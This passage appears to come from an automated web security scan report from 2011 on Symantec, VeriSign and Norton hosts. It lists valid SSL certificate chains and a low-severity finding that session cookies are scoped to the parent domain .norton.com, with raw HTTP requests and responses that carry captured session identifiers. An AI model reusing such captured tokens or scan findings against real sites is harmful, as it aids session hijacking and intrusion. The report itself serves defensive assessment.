Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.32. https://vipmanager.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://vipmanager.verisign.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: vipmanager.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL CA Valid from: Sun Mar 07 18:00:00 GMT-06:00 2010 Valid to: Sat Mar 24 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.33. https://vipmobile.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://vipmobile.verisign.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: vipmobile.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Sun Dec 12 18:00:00 GMT-06:00 2010 Valid to: Wed Dec 12 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.34. https://vs.symantec.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://vs.symantec.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: vs.symantec.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Mon Jun 27 18:00:00 GMT-06:00 2011 Valid to: Thu Jun 27 17:59:59 GMT-06:00 2013
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.35. https://www-secure.symantec.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www-secure.symantec.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: www-secure.symantec.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Fri Oct 08 18:00:00 GMT-06:00 2010 Valid to: Mon Oct 08 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.36. https://www.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.verisign.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: www.verisign.com Issued by: VeriSign Class 3 Extended Validation SSL SGC CA Valid from: Tue May 25 18:00:00 GMT-06:00 2010 Valid to: Fri May 25 17:59:59 GMT-06:00 2012
Certificate chain #1 Issued to: VeriSign Class 3 Extended Validation SSL SGC CA Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Mon Nov 07 17:59:59 GMT-06:00 2016
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
8.37. https://www4.symantec.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www4.symantec.com
Path:
/
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational. The server presented the following certificates:Server certificate Issued to: www4.symantec.com Issued by: VeriSign Class 3 International Server CA - G3 Valid from: Thu Nov 18 18:00:00 GMT-06:00 2010 Valid to: Sat Nov 19 17:59:59 GMT-06:00 2011
Certificate chain #1 Issued to: VeriSign Class 3 International Server CA - G3 Issued by: VeriSign Class 3 Public Primary Certification Authority - G5 Valid from: Sun Feb 07 18:00:00 GMT-06:00 2010 Valid to: Fri Feb 07 17:59:59 GMT-06:00 2020
Certificate chain #2 Issued to: VeriSign Class 3 Public Primary Certification Authority - G5 Issued by: Class 3 Public Primary Certification Authority Valid from: Tue Nov 07 18:00:00 GMT-06:00 2006 Valid to: Sun Nov 07 17:59:59 GMT-06:00 2021
Certificate chain #3 Issued to: Class 3 Public Primary Certification Authority Issued by: Class 3 Public Primary Certification Authority Valid from: Sun Jan 28 18:00:00 GMT-06:00 1996 Valid to: Wed Aug 02 17:59:59 GMT-06:00 2028
9. Cookie scoped to parent domain
previous
next
There are 82 instances of this issue:
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
9.1. http://buy.norton.com/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?wicket:interface=:0:hf_pnl_mf_nprd_HeaderTopPanel_0:countryDropdown:globalStores:0:globalStore::ILinkListener:: HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:25 GMT Location: http://buy.norton.com/redirector/estore?COUNTRY=AR&VENDORID=Symantec_symEpVendor&LANGUAGE=ES&CURRENCY=ARS&PROMOID=Set-Cookie: symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 455 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/redirector/e...[SNIP]...
9.2. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:44 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 54738 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.3. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:47 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 52186 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.4. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:49 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 48409 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.5. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/ sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0,must-revalidate, no-store Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:52 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/ Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 63835 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.6. http://buy.norton.com/estore/mf/landingProductFeatures
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/landingProductFeatures
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 HTTP/1.1 Host: buy.norton.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; LASTTIME_CV_DATE=Sep-09-2011 14:31:16; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); BIGipServerbuy1_prd_SSL=4046749583.16671.0000
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:18 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 55880 Connection: Keep-Alive <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js i...[SNIP]...
9.7. http://buy.norton.com/estore/mf/landingPromotion
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/landingPromotion
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/landingPromotion HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:32 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 50623 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.8. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:58 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 68924 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.9. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:02 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 73974 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.10. http://buy.norton.com/estore/mf/upgradeCenter
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/upgradeCenter
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/mf/upgradeCenter HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:30 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 137137 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.11. http://buy.norton.com/estore/mf/upgradeRenewal
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/mf/upgradeRenewal
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
